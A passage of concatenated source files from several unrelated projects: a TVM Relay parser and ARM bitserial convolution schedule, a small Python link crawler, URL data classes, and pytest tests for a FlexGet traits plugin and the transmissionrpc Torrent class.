self.mk_global_var(ident_name) self.module[ident] = self.mk_func(ctx) def handle_adt_header( self, ctx: Union[RelayParser.ExternAdtDefnContext, RelayParser.AdtDefnContext]): """Handles parsing of the name and type params of an ADT definition.""" adt_name = ctx.generalIdent().getText() adt_var = self.mk_global_typ_var(adt_name, ty.Kind.AdtHandle) # parse type params type_params = ctx.typeParamList() if type_params is None: type_params = [] else: type_params = [self.mk_typ(type_ident.getText(), ty.Kind.Type) for type_ident in type_params.generalIdent()] return adt_var, type_params def visitExternAdtDefn(self, ctx: RelayParser.ExternAdtDefnContext): # TODO(weberlo): update this handler once extern is implemented self.enter_type_param_scope() adt_var, type_params = self.handle_adt_header(ctx) # update module being built self.module[adt_var] = adt.TypeData(adt_var, type_params, []) self.exit_type_param_scope() def visitAdtDefn(self, ctx: RelayParser.AdtDefnContext): self.enter_type_param_scope() adt_var, type_params = self.handle_adt_header(ctx) # parse constructors adt_cons_defns = ctx.adtConsDefnList() if adt_cons_defns is None: adt_cons_defns = [] else: adt_cons_defns = adt_cons_defns.adtConsDefn() parsed_constructors = [] for cons_defn in adt_cons_defns: inputs = [self.visit(inp) for inp in cons_defn.typeExpr()] cons_defn_name = cons_defn.constructorName().getText() cons_defn = adt.Constructor(cons_defn_name, inputs, adt_var) self.mk_global_typ_cons(cons_defn_name, cons_defn) parsed_constructors.append(cons_defn) # update module being built self.module[adt_var] = adt.TypeData(adt_var, type_params, parsed_constructors) self.exit_type_param_scope() def visitMatch(self, ctx: RelayParser.MatchContext): match_type = ctx.matchType().getText() if match_type == "match": complete_match = True elif match_type == "match?": complete_match = False else: raise RuntimeError(f"unknown match type {match_type}") # TODO: Will need some kind of type checking to know which ADT is being # matched on. match_data = self.visit(ctx.expr()) match_clauses = ctx.matchClauseList() if match_clauses is None: match_clauses = [] else: match_clauses = match_clauses.matchClause() parsed_clauses = [] for clause in match_clauses: constructor_name = clause.constructorName().getText() constructor = self.global_type_vars[constructor_name] self.enter_var_scope() patternList = clause.patternList() if patternList is None: patterns = [] else: patterns = [self.visit(pattern) for pattern in patternList.pattern()] clause_body = self.visit(clause.expr()) self.exit_var_scope() # TODO: Do we need to pass `None` if it's a 0-arity cons, or is an empty list fine? parsed_clauses.append(adt.Clause( adt.PatternConstructor( constructor, patterns ), clause_body )) return adt.Match(match_data, parsed_clauses, complete=complete_match) def visitPattern(self, ctx: RelayParser.PatternContext): text = ctx.getText() if text == "_": return adt.PatternWildcard() elif text.startswith("%"): text = ctx.localVar().getText() typ = ctx.typeExpr() if typ is not None: typ = self.visit(typ) var = self.mk_var(text[1:], typ=typ) return adt.PatternVar(var) else: raise ParseError(f"invalid pattern syntax \"{text}\"") def visitCallNoAttr(self, ctx: RelayParser.CallNoAttrContext): return (self.visit_list(ctx.exprList().expr()), None) def visitCallWithAttr(self, ctx: RelayParser.CallWithAttrContext): return (self.visit_list(ctx.expr()), self.visit(ctx.attrSeq())) def call(self, func, args, attrs, type_args): if isinstance(func, OpWrapper): return func(args, attrs, type_args) elif isinstance(func, adt.Constructor): return func(*args) return expr.Call(func, args, attrs, type_args) @spanify def visitCall(self, ctx: RelayParser.CallContext): # type: (RelayParser.CallContext) -> expr.Call func = self.visit(ctx.expr()) args, attrs = self.visit(ctx.callList()) res = self.call(func, args, attrs, []) return res @spanify def visitIfElse(self, ctx: RelayParser.IfElseContext): # type: (RelayParser.IfElseContext) -> expr.If """Construct a Relay If node. Creates a new scope for each branch.""" cond = self.visit(ctx.expr()) self.enter_var_scope() true_branch = self.visit(ctx.body(0)) self.exit_var_scope() self.enter_var_scope() false_branch = self.visit(ctx.body(1)) self.exit_var_scope() return expr.If(cond, true_branch, false_branch) @spanify def visitGraph(self, ctx: RelayParser.GraphContext): # type: (RelayParser.GraphContext) -> expr.Expr """Visit a graph variable assignment.""" graph_nid = int(ctx.graphVar().getText()[1:]) self.enter_var_scope() value = self.visit(ctx.expr(0)) self.exit_var_scope() if graph_nid != len(self.graph_expr): raise ParseError( "expected new graph variable to be `%{}`,".format(len(self.graph_expr)) + \ "but got `%{}`".format(graph_nid)) self.graph_expr.append(value) kont = self.visit(ctx.expr(1)) return kont # Types # pylint: disable=unused-argument def visitIncompleteType(self, ctx: RelayParser.IncompleteTypeContext): # type (RelayParser.IncompleteTypeContext) -> None: return None def visitTypeCallType(self, ctx: RelayParser.TypeCallTypeContext): func = self.visit(ctx.generalIdent()) args = [self.visit(arg) for arg in ctx.typeParamList().generalIdent()] return ty.TypeCall(func, args) def visitParensShape(self, ctx: RelayParser.ParensShapeContext): # type: (RelayParser.ParensShapeContext) -> int return self.visit(ctx.shape()) def visitShapeList(self, ctx: RelayParser.ShapeListContext): # type: (RelayParser.ShapeListContext) -> List[int] return self.visit_list(ctx.shape()) def visitTensor(self, ctx: RelayParser.TensorContext): return tuple(self.visit_list(ctx.expr())) def visitTensorType(self, ctx: RelayParser.TensorTypeContext): # type: (RelayParser.TensorTypeContext) -> ty.TensorType """Create a simple tensor type. No generics.""" shape = self.visit(ctx.shapeList()) dtype = self.visit(ctx.typeExpr()) if not isinstance(dtype, ty.TensorType): raise ParseError("expected dtype to be a Relay base type.") dtype = dtype.dtype return ty.TensorType(shape, dtype) def visitTupleType(self, ctx: RelayParser.TupleTypeContext): # type: (RelayParser.TupleTypeContext) -> ty.TupleType return ty.TupleType(self.visit_list(ctx.typeExpr())) def visitFuncType(self, ctx: RelayParser.FuncTypeContext): # type: (RelayParser.FuncTypeContext) -> ty.FuncType types = self.visit_list(ctx.typeExpr()) arg_types = types[:-1] ret_type = types[-1] return ty.FuncType(arg_types, ret_type, [], None) def make_parser(data): # type: (str) -> RelayParser """Construct a RelayParser a given data stream.""" input_stream = InputStream(data) lexer = RelayLexer(input_stream) lexer.addErrorListener(StrictErrorListener(data)) token_stream = CommonTokenStream(lexer) p = RelayParser(token_stream) p.addErrorListener(StrictErrorListener(data)) return p __source_name_counter__ = 0 class StrictErrorListener(ErrorListener): """This ErrorListener fail eagerly on all error, and report the program.""" def __init__(self, text): self.text = text def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e): raise Exception("Syntax Error in:\n" + self.text) def reportAmbiguity(self, recognizer, dfa, startIndex, stopIndex, exact, ambigAlts, configs): raise Exception("Ambiguity Error in:\n" + self.text) def reportAttemptingFullContext(self, recognizer, dfa, startIndex, stopIndex, conflictingAlts, configs): raise Exception("Attempting Full Context in:\n" + self.text) def reportContextSensitivity(self, recognizer, dfa, startIndex, stopIndex, prediction, configs): raise Exception("Context Sensitivity in:\n" + self.text) def fromtext(data, source_name=None): # type: (str, str) -> Union[expr.Expr, module.Module] """Parse a Relay program.""" if data == "": raise ParseError("cannot parse the empty string.") global __source_name_counter__ if source_name is None: source_name = "source_file{0}".format(__source_name_counter__) if isinstance(source_name, str): source_name = SourceName(source_name) tree = make_parser(data).prog() return ParseTreeToRelayIR(source_name).visit(tree) ``` #### File: topi/arm_cpu/bitserial_conv2d.py ```python from __future__ import absolute_import as _abs import tvm from tvm import autotvm from tvm import relay from .. import tag from ..nn.pad import pad from ..nn.bitserial_conv2d import bitserial_conv2d_nhwc, bitserial_conv2d_legalize from ..nn.bitserial_util import bitpack, binary_op_multiplier from ..nn.util import get_pad_tuple from ..util import get_const_int, get_const_tuple from .. import generic def _kernel_vec_spatial_pack_nhwc(kernel, kernel_bits, VC, use_bitpack=True): if use_bitpack: kernel_q = bitpack(kernel, kernel_bits, pack_axis=2, bit_axis=2, pack_type='uint8') else: kernel_q = kernel KH, KW, KB, CI, CO = kernel_q.shape kvshape = (CO//VC, KH, KW, KB, VC, CI) return tvm.compute(kvshape, lambda co, dh, dw, b, vc, ci: \ kernel_q[dh][dw][b][ci][co*VC+vc], name='kernel_vec') @autotvm.register_topi_compute(bitserial_conv2d_nhwc, 'arm_cpu', 'direct') def spatial_pack_nhwc(cfg, data, kernel, stride, padding, activation_bits, weight_bits, pack_dtype, out_dtype, unipolar): """ Compute convolution with pack on spatial axes. """ assert data.shape[0].value == 1, "spatial pack convolution only support batch size=1" assert pack_dtype == 'uint8', "only support packing into uint8 bits" assert out_dtype == 'int16', "only support output type of int16" N, H, W, CI = get_const_tuple(data.shape) if len(kernel.shape) == 4: KH, KW, _, CO = get_const_tuple(kernel.shape) CI_packed = CI // 8 else: KH, KW, KB, CI_packed, CO = get_const_tuple(kernel.shape) if isinstance(padding, int) or (isinstance(padding, (tuple, list)) and len(padding) == 2): TPAD, LPAD, DPAD, RPAD = get_pad_tuple(padding, kernel) else: TPAD, LPAD, DPAD, RPAD = padding if isinstance(stride, (tuple, list)): HSTR, WSTR = stride else: HSTR, WSTR = stride, stride HCAT, WCAT = KH-1, KW-1 PAD_H = H + (TPAD + DPAD) PAD_W = W + (LPAD + RPAD) OH = (PAD_H - KH) // HSTR + 1 OW = (PAD_W - KW) // WSTR + 1 oshape = (1, OH, OW, CO) # Pad input channels of weights and data when it is not a multiple of 8 if CI_packed % 8 != 0: CI_PAD = CI_packed % 8 CI_packed += CI_PAD else: CI_PAD = 0 # ==================== define configuration space ==================== n, oh, ow, co = cfg.axis(N), cfg.axis(OH), cfg.axis(OW), cfg.axis(CO) ci, kh, kw = cfg.reduce_axis(CI_packed), cfg.reduce_axis(KH), cfg.reduce_axis(KW) ib, kb = cfg.reduce_axis(activation_bits), cfg.reduce_axis(weight_bits) co, vc = cfg.define_split('tile_co', co, num_outputs=2, filter=lambda x: x.size[-1] == 8) oh, vh = cfg.define_split('tile_oh', oh, num_outputs=2, filter=lambda x: x.size[-1] >= 2) ow, vw = cfg.define_split('tile_ow', ow, num_outputs=2, filter=lambda x: x.size[-1] >= 2) ci_o, ci_i = cfg.define_split("tile_ci", ci, num_outputs=2, filter=lambda x: x.size[-1] == 8 or x.size[-1] == 16) re_axes = cfg.define_reorder("reorder_0", [n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i], policy='candidate', candidate=[ [n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i], [n, oh, ow, co, vh, vw, kw, kh, ci_o, kb, ib, vc, ci_i],]) # binary ops cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW * binary_op_multiplier(pack_dtype)) # ==================== VC = cfg["tile_co"].size[-1] VH = cfg["tile_oh"].size[-1] VW = cfg["tile_ow"].size[-1] data_q = bitpack(data, activation_bits, pack_axis=3, bit_axis=3, pack_type='uint8') kernel_vec = _kernel_vec_spatial_pack_nhwc(kernel, weight_bits, VC, len(kernel.shape) == 4) if kernel_vec.shape[-1] % 8 != 0 and CI_PAD != 0: kernel_vec = pad(kernel_vec, [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, CI_PAD]) N, H, W, IB, CI = data_q.shape OCO, KH, KW, KB, VC, CI = kernel_vec.shape dvshape = (N, PAD_H//(VH*HSTR), PAD_W//(VW*WSTR), VH*HSTR+HCAT, VW*WSTR+WCAT, IB, CI) ovshape = (1, OH // VH, OW // VW, CO // VC, VH, VW, VC) if (TPAD != 0 and RPAD != 0): data_pad = pad(data_q, (0, TPAD, LPAD, 0, 0), (0, DPAD, RPAD, 0, CI_PAD), name="data_pad") elif CI_PAD != 0: data_pad = pad(data_q, (0, 0, 0, 0, 0), (0, 0, 0, 0, CI_PAD), name="data_pad") else: data_pad = data_q data_vec = tvm.compute(dvshape, lambda n, h, w, vh, vw, b, ci: \ data_pad[n][h*VH*HSTR+vh][w*VW*WSTR+vw][b][ci], name='data_vec') ci = tvm.reduce_axis((0, CI), name='ci') dh = tvm.reduce_axis((0, KH), name='dh') dw = tvm.reduce_axis((0, KW), name='dw') ib = tvm.reduce_axis((0, IB), name='ib') kb = tvm.reduce_axis((0, KB), name='kb') def _bipolar_conv(n, h, w, co, vh, vw, vc): return tvm.sum((tvm.popcount( kernel_vec[co, dh, dw, kb, vc, ci].astype('uint16') & data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci].astype('uint16')) << (kb + ib).astype('uint16')), axis=[dh, dw, kb, ib, ci]) def _unipolar_conv(n, h, w, co, vh, vw, vc): return tvm.sum( ((tvm.popcount(kernel_vec[co, dh, dw, kb, vc, ci].astype('int16') & data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci].astype('int16')) - tvm.popcount(~kernel_vec[co, dh, dw, kb, vc, ci].astype('int16') & data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci]).astype('int16')) << (kb + ib).astype('int16')), axis=[dh, dw, kb, ib, ci]) if unipolar: conv_vec = tvm.compute(ovshape, _unipolar_conv, name='conv_vec', tag='unipolar') else: conv_vec = tvm.compute(ovshape, _bipolar_conv, name='conv_vec', tag='bipolar') conv = tvm.compute(oshape, lambda n, h, w, co: conv_vec[n][h//VH][w//VW][co//VC][h%VH][w%VW][co%VC].astype(out_dtype), name='conv', tag='spatial_bitserial_conv_nhwc') return conv def _intrin_popcount(m, k_i, w_b, x_b, unipolar): pack_dtype = 'uint8' w = tvm.placeholder((w_b, m, k_i), dtype=pack_dtype, name='w') x = tvm.placeholder((x_b, k_i,), dtype=pack_dtype, name='x') k = tvm.reduce_axis((0, k_i), name='k') bw = tvm.reduce_axis((0, w_b), name='bw') bx = tvm.reduce_axis((0, x_b), name='bx') if unipolar: dtype = 'int16' z = tvm.compute((m,), lambda i: tvm.sum((tvm.popcount(w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype)) - tvm.popcount(~w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype))) << (bw+bx).astype(dtype), axis=[bw, bx, k]), name='z') else: dtype = 'uint16' z = tvm.compute((m,), lambda i: tvm.sum(tvm.popcount(w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype)) << (bw+bx).astype(dtype), axis=[bw, bx, k]), name='z') Wb = tvm.decl_buffer(w.shape, w.dtype, name="W", offset_factor=k_i, strides=[tvm.var('ldw'), tvm.var('ldw'), 1]) # stride can be inferred Xb = tvm.decl_buffer(x.shape, x.dtype, name="X", offset_factor=k_i, strides=[tvm.var('ldw'), 1]) Zb = tvm.decl_buffer(z.shape, z.dtype, name="Z", offset_factor=1, strides=[1]) def _intrin_func(ins, outs): ww, xx = ins zz = outs[0] args_1 = tvm.const(1, 'uint32') args_2 = tvm.const(2, 'uint32') if unipolar: vpadd = "llvm.arm.neon.vpadd.v8i8" vpadalu = "llvm.arm.neon.vpadals.v16i8.v8i16" full_dtype = 'int8x16' half_dtype = 'int8x8' return_dtype = 'int16x8' else: vpadd = "llvm.arm.neon.vpadd.v8u8" vpadalu = "llvm.arm.neon.vpadalu.v16u8.v8u16" full_dtype = 'uint8x16' half_dtype = 'uint8x8' return_dtype = 'uint16x8' def _instr(index): irb = tvm.ir_builder.create() if index == 1: # reduce reset irb.emit(zz.vstore(0, tvm.const(0, return_dtype))) return irb.get() # body and reduce update cnts8 = [None] * 8 cnts4 = [None] * 4 cnts2 = [None] * 2 for bw in range(w_b): for bx in range(x_b): if k_i == 16: for i in range(m): w_ = ww.vload([bw, i, 0], 'uint8x16').astype(full_dtype) x_ = xx.vload([bx, 0], 'uint8x16').astype(full_dtype) if unipolar: cnts = tvm.popcount(w_ & x_) - tvm.popcount(~w_ & x_) else: cnts = tvm.popcount(w_ & x_) upper_half = tvm.call_pure_intrin(half_dtype, 'vectorhigh', cnts) lower_half = tvm.call_pure_intrin(half_dtype, 'vectorlow', cnts) cnts8[i] = upper_half + lower_half for i in range(m//2): cnts4[i] = tvm.call_llvm_intrin(half_dtype, vpadd, args_1, cnts8[i*2], cnts8[i*2+1]) for i in range(m//4): cnts2[i] = tvm.call_llvm_intrin(half_dtype, vpadd, args_1, cnts4[i*2], cnts4[i*2+1]) cnts = tvm.call_pure_intrin(full_dtype, 'vectorcombine', cnts2[0], cnts2[1]) shifted_cnts = cnts << tvm.const(bw+bx, pack_dtype) out = tvm.call_llvm_intrin(return_dtype, vpadalu, args_2, zz.vload(0, return_dtype), shifted_cnts) else: # ki == 8 for i in range(m): w_ = ww.vload([bw, i, 0], 'uint8x8').astype(half_dtype) x_ = xx.vload([bx, 0], 'uint8x8').astype(half_dtype) if unipolar: cnts8[i] = tvm.popcount(w_ & x_) - tvm.popcount(~w_ & x_) else: cnts8[i] = tvm.popcount(w_ & x_) for i in range(m//2): cnts4[i] = tvm.call_llvm_intrin(half_dtype, vpadd, args_1, cnts8[i*2], cnts8[i*2+1]) for i in range(m//4): cnts2[i] = tvm.call_llvm_intrin(half_dtype, vpadd, args_1, cnts4[i*2], cnts4[i*2+1]) cnts = tvm.call_pure_intrin(full_dtype, 'vectorcombine', cnts2[0], cnts2[1]) shifted_cnts = cnts << tvm.const(bw+bx, pack_dtype) out = tvm.call_llvm_intrin(return_dtype, vpadalu, args_2, zz.vload(0, return_dtype), shifted_cnts) irb.emit(zz.vstore(0, out)) return irb.get() # body, reset, update return _instr(0), _instr(1), _instr(2) with tvm.build_config(offset_factor=1, partition_const_loop=True): return tvm.decl_tensor_intrin(z.op, _intrin_func, binds={w: Wb, x:Xb, z:Zb}) # ARM specific schedule that using custom microkernel def _schedule_spatial_conv2d_nhwc(cfg, s, data_pad, data_vec, kernel_vec, conv_out, output, last, unipolar): _, _, _, _, _, IB, CI = data_vec.shape _, KH, KW, KB, _, _ = kernel_vec.shape KB = get_const_int(KB) IB = get_const_int(IB) VC = cfg["tile_co"].size[-1] VH = cfg["tile_oh"].size[-1] VW = cfg["tile_ow"].size[-1] ##### Schedule data padding and packing if data_pad is not None: s[data_pad].compute_inline() _, h, _, _, _, _, _ = s[data_vec].op.axis cfg.define_split("tile_ah", cfg.axis(h), num_outputs=2, max_factor=32) oh, ih = cfg["tile_ah"].apply(s, data_vec, h) s[data_vec].parallel(oh) #### Schedule kernel packing co, _, _, _, _, _ = s[kernel_vec].op.axis cfg.define_split("tile_bco", cfg.axis(co), num_outputs=2, max_factor=32) oco, ico = cfg["tile_bco"].apply(s, kernel_vec, co) s[kernel_vec].parallel(oco) ##### Schedule Convolution n, oh, ow, co, vh, vw, vc = s[conv_out].op.axis kh, kw, kb, ib, ci = s[conv_out].op.reduce_axis ci_o, ci_i = cfg['tile_ci'].apply(s, conv_out, ci) re_axes = cfg["reorder_0"].apply(s, conv_out, [n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i]) # Use microkernel kfactor = cfg['tile_ci'].size[1] if kfactor % 8 == 0: pc = _intrin_popcount(VC, kfactor, KB, IB, unipolar) s[conv_out].tensorize(kb, pc) n, h, w, co = s[last].op.axis co, vc = cfg['tile_co'].apply(s, last, co) oh, vh = cfg['tile_oh'].apply(s, last, h) ow, vw = cfg['tile_ow'].apply(s, last, w) s[last].reorder(n, oh, ow, co, vh, vw, vc) s[last].vectorize(vc) if last != output: s[last].compute_inline() s[conv_out].compute_at(s[last], co) s[last].parallel(oh) return s @autotvm.register_topi_schedule(generic.nn.schedule_bitserial_conv2d_nhwc, 'arm_cpu', 'direct') def schedule_bitserial_conv2d_nhwc(cfg, outs): """Arm cpu schedule for bitserial conv2d""" s = tvm.create_schedule([x.op for x in outs]) scheduled_ops = [] def traverse(op): """Traverse operators from computation graph""" # inline all one-to-one-mapping operators except the last stage (output) if tag.is_broadcast(op.tag): if op not in s.outputs: s[op].compute_inline() for tensor in op.input_tensors: if isinstance(tensor.op, tvm.tensor.ComputeOp) and tensor.op not in scheduled_ops: traverse(tensor.op) if 'spatial_bitserial_conv_nhwc' in op.tag: output = op.output(0) conv_out = op.input_tensors[0] kernel_vec = conv_out.op.input_tensors[0] kernel_q = kernel_vec.op.input_tensors[0] data_vec = conv_out.op.input_tensors[1] data_q = data_vec.op.input_tensors[0] data = data_q.op.input_tensors[0] data_pad = None if isinstance(data_q.op, tvm.tensor.ComputeOp) and "pad" in data_q.op.tag: data_pad = data_q data_q = data data = data.op.input_tensors[0] unipolar = "unipolar" in conv_out.op.tag _schedule_spatial_conv2d_nhwc(cfg, s, data_pad, data_vec, kernel_vec, conv_out, output, outs[0], unipolar) scheduled_ops.append(op) traverse(outs[0].op) return s @bitserial_conv2d_legalize.register("arm_cpu") def _bitserial_conv2d_legalize(attrs, inputs, arg_types): """Legalizes Bitserial Conv2D op. Parameters ---------- attrs : tvm.attrs.Attrs Attributes of current convolution inputs : list of tvm.relay.Expr The args of the Relay expr to be legalized types : list of types List of input and output types Returns ------- result : tvm.relay.Expr The legalized expr """ # Fix different kernel layouts where possible. if attrs['data_layout'] == 'NHWC': data, kernel = inputs if len(kernel.data.shape) == 4: # HWIO layout is expected for NHWC input. if attrs['kernel_layout'] == 'HWOI': # Handle HWOI layout. This is common in TF depthwise conv2d graph. kernel = relay.transpose(kernel, axes=(0, 1, 3, 2)) elif attrs['kernel_layout'] == 'OIHW': kernel = relay.transpose(kernel, axes=(2, 3, 1, 0)) ## Set new attrs for the tranposed conv. new_attrs = {k: attrs[k] for k in attrs.keys()} new_attrs['kernel_layout'] = 'HWIO' conv = relay.nn.bitserial_conv2d(data, kernel, **new_attrs) return conv return None ```
{ "source": "0x00red/pycrawl", "score": 3 }
#### File: 0x00red/pycrawl/main.py ```python import urllib2 import sys import os ##functions def parseQmark(addr): ##removes sql i = 0 out = "" try: while(addr[i] != "?"): out = out + addr[i] i = i + 1 except: return addr return out def openLink(address, local, current): ##returns list of addresses tryflag = 0 out = [] out2 = [] try: url = urllib2.urlopen(address) except: return "" url = url.read() url = url.split("\"") for line in url: if tryflag == 1: out.append(line) tryflag = 0 else: if line[-7:] == "a href=": tryflag = 1 continue for addr in out: addr = parseQmark(addr) if addr[0:4] == "http": out2.append(addr) continue elif addr[0] == "/": out2.append(local + addr) else: if current[-1] == "/": out2.append(current + addr) else: out2.append(current + "/" + addr) return out2 def getRelative(addr): ##gets the server's address out = "" i = 0 if addr[0:7] == "http://": i = 7 if addr[0:8] == "https://": i = 8 try: while(addr[i] != "/"): out = out + addr[i] i = i + 1 except: return addr return out ##main try: f = open("config.txt","r") config = f.read() config = config.split("\n") f.close() ITERATIONS = int(config[0]) except: print("Config error") sys.exit(0) current = raw_input("Web address: ") if current[0:4] != "http": current = "http://" + current queue = [current, ] oldqueue = queue completed = [] fyon = raw_input("Would you like to export to a file? y/n: ") fyon = fyon.lower() if fyon == "y" or fyon == "yes": fyon = 1 file = raw_input("Filename: ") try: f = open(file, "w") f.close() except: print("Unknown error.") i = -1 cIT = 0 while(1): try: while(1): while(cIT == ITERATIONS): cont = raw_input("Continue? ") cont = cont.lower() if cont == "yes": cIT = -1 break elif cont == "no": os._exit(0) else: continue cIT = cIT + 1 i = i + 1 addr = queue[i] current = addr relative = getRelative(addr) if addr in completed: continue if openLink(addr, relative, current) == "": continue queue = queue + openLink(addr, relative, current) oldqueue = queue print(addr) if fyon == 1: try: f = open(file, "r") fcon = f.read() f.close() f = open(file, "w") f.write(fcon + addr + "\n") f.close() except: f = open(file, "w") f.write(addr + "\n") f.close() completed.append(addr) except: queue = oldqueue[::-1] ```
{ "source": "0x00-x/vulcan", "score": 3 }
#### File: vulcan/vulcan/Data.py ```python class UrlData(object): '''URL对象类''' def __init__(self, url, html=None, depth=0): self.url = url self.html = html self.depth = depth self.params = {} self.fragments = {} self.post_data = {} def __str__(self): return self.url def __repr__(self): return '<Url data: %s>' % (self.url,) def __hash__(self): return hash(self.url) class UrlCache(object): '''URL缓存类''' def __init__(self): self.__url_cache = {} def __len__(self): return len(self.__url_cache) def __contains__(self,url): return hash(url) in self.__url_cache.keys() def __iter__(self): for url in self.__url_cache: yield url def insert(self,url): if isinstance(url,basestring): url = UrlData(url) if url not in self.__url_cache: self.__url_cache.setdefault(hash(url),url) ```
{ "source": "0x022b/flexget-plugin-traits", "score": 2 }
#### File: flexget-plugin-traits/tests/test_example.py ```python import pytest from flexget.utils.qualities import QualityComponent from typing import Generator from typing import Tuple from .utils import load_yaml_file class QualityComponentMock(QualityComponent): def __init__(self, type: str, value: int, name: str, regexp: str) -> None: super().__init__(type, value, name, regexp) self._raw_regexp = regexp def __repr__(self) -> str: return "<{}(value={},name={},regexp={})>".format( self.type.title(), self.value, self.name, self._raw_regexp ) def __str__(self) -> str: return f"{self.name}" class QualityTestPattern: def __init__(self, type: str, name: str, pattern: str) -> None: self.type = type self.name = name self.pattern = pattern def __repr__(self) -> str: return "<{}(name={},pattern={})>".format( self.type.title(), self.name, self.pattern ) def __str__(self) -> str: return f"{self.pattern}" def patterns() -> Generator[QualityTestPattern, None, None]: content = load_yaml_file("tests/configuration.yaml") for type, quality in content.get("patterns").items(): values = dict(content.get("defaults")) for name, identifiers in quality.items(): for identifier in identifiers: values[type] = identifier for template in content.get("templates"): if f"{{{type}}}" in template: p = ( template.replace(".", " ") .replace("-", "/") .replace("{{audio}}", values["audio"]) .replace("{{codec}}", values["codec"]) .replace("{{color_range}}", values["color_range"]) .replace("{{resolution}}", values["resolution"]) .replace("{{source}}", values["source"]) ) yield QualityTestPattern(type, name, p.replace("/", " ")) p = p.replace("/", "-") yield QualityTestPattern(type, name, p.replace(" ", ".")) yield QualityTestPattern(type, name, p.replace(" ", "-")) def qualities() -> Generator[QualityComponentMock, None, None]: content = load_yaml_file("examples/traits.yaml") for type, quality in content["traits"].items(): for name, props in quality.items(): yield QualityComponentMock( type, props.get("value", 0), name, props.get("regexp", name) ) def quality_test_params() -> Generator[ Tuple[QualityComponentMock, QualityTestPattern], None, None ]: for quality in qualities(): for pattern in patterns(): if quality.type == pattern.type: yield (quality, pattern) @pytest.mark.parametrize("quality, pattern", quality_test_params(), ids=str) def test_quality(quality, pattern) -> None: match = quality.regexp.search(pattern.pattern) if quality.name == pattern.name: assert match, f"'{quality}' should match '{pattern}'" else: assert not match, f"'{quality}' should not match '{pattern}'" ``` #### File: flexget-plugin-traits/tests/test_plugin.py ```python import pytest from flexget.utils import qualities from flexget.utils.qualities import QualityComponent from flexget.utils.qualities import Requirements from jsonschema import Draft4Validator as validator from typing import Any from typing import Generator from typing import List from typing import Tuple from .test_example import patterns from .utils import load_yaml_file from traits.traits import Traits @pytest.fixture(scope="module") def config() -> dict[str, Any]: return load_yaml_file("examples/traits.yaml").get("traits") def quality_asserts( quality_components: dict[str, QualityComponent] ) -> Generator[Tuple[int, List[int]], None, None]: for type, components in quality_components.items(): _qualities = [id(x) for x in getattr(qualities, f"_{type}s", [])] for _id in [id(x) for x in components]: yield (_id, _qualities) @pytest.fixture(scope="module") def task() -> Traits: return Traits() def test_on_task_start(task, config) -> None: task.on_task_start(None, config) for (original, current) in quality_asserts(task._original_qualities): assert original not in current @pytest.mark.parametrize("pattern", patterns(), ids=str) def test_requirements_allows(pattern) -> None: assert Requirements(pattern.name).allows(str(pattern)) def test_on_task_exit(task, config) -> None: task.on_task_exit(None, config) for (original, current) in quality_asserts(task._original_qualities): assert original in current def test_schema_definition(task, config) -> None: validator.check_schema(task.schema) validator(task.schema).validate(config) ```
{ "source": "0x022b/transmissionrpc", "score": 3 }
#### File: transmissionrpc/test/torrent.py ```python import time import datetime import unittest import transmissionrpc import transmissionrpc.constants import transmissionrpc.utils from transmissionrpc.torrent import Torrent class torrent(unittest.TestCase): def assertPropertyException(self, exception, object, property): try: getattr(object, property) except exception: pass else: self.fail() def testConstruction(self): self.assertRaises(ValueError, Torrent, None, {}) Torrent(None, {"id": 42}) def testAttributes(self): torrent = Torrent(None, {"id": 42}) self.assertTrue(hasattr(torrent, "id")) self.assertEqual(torrent.id, 42) self.assertPropertyException(KeyError, torrent, "status") self.assertPropertyException(KeyError, torrent, "progress") self.assertPropertyException(KeyError, torrent, "ratio") self.assertPropertyException(KeyError, torrent, "eta") self.assertPropertyException(KeyError, torrent, "date_active") self.assertPropertyException(KeyError, torrent, "date_added") self.assertPropertyException(KeyError, torrent, "date_started") self.assertPropertyException(KeyError, torrent, "date_done") self.assertRaises(KeyError, torrent.format_eta) self.assertEqual(torrent.files(), {}) data = { "id": 1, "status": 4, "sizeWhenDone": 1000, "leftUntilDone": 500, "uploadedEver": 1000, "downloadedEver": 2000, "uploadRatio": 0.5, "eta": 3600, "activityDate": time.mktime((2008, 12, 11, 11, 15, 30, 0, 0, -1)), "addedDate": time.mktime((2008, 12, 11, 8, 5, 10, 0, 0, -1)), "startDate": time.mktime((2008, 12, 11, 9, 10, 5, 0, 0, -1)), "doneDate": time.mktime((2008, 12, 11, 10, 0, 15, 0, 0, -1)), } torrent = Torrent(None, data) self.assertEqual(torrent.id, 1) self.assertEqual(torrent.leftUntilDone, 500) self.assertEqual(torrent.status, "downloading") self.assertEqual(torrent.progress, 50.0) self.assertEqual(torrent.ratio, 0.5) self.assertEqual(torrent.eta, datetime.timedelta(seconds=3600)) self.assertEqual( torrent.date_active, datetime.datetime(2008, 12, 11, 11, 15, 30) ) self.assertEqual(torrent.date_added, datetime.datetime(2008, 12, 11, 8, 5, 10)) self.assertEqual( torrent.date_started, datetime.datetime(2008, 12, 11, 9, 10, 5) ) self.assertEqual(torrent.date_done, datetime.datetime(2008, 12, 11, 10, 0, 15)) self.assertEqual( torrent.format_eta(), transmissionrpc.utils.format_timedelta(torrent.eta) ) torrent = Torrent(None, {"id": 42, "eta": -1}) self.assertPropertyException(ValueError, torrent, "eta") data = { "id": 1, "status": 4, "sizeWhenDone": 1000, "leftUntilDone": 500, "uploadedEver": 1000, "downloadedEver": 2000, "uploadRatio": 0.5, "eta": 3600, "activityDate": time.mktime((2008, 12, 11, 11, 15, 30, 0, 0, -1)), "addedDate": time.mktime((2008, 12, 11, 8, 5, 10, 0, 0, -1)), "startDate": time.mktime((2008, 12, 11, 9, 10, 5, 0, 0, -1)), "doneDate": 0, } torrent = Torrent(None, data) self.assertEqual(torrent.date_done, None) def testUnicode(self): torrent = Torrent(None, {"id": 42, "name": "あみ"}) self.assertEqual(torrent.id, 42) repr(torrent) str(torrent) 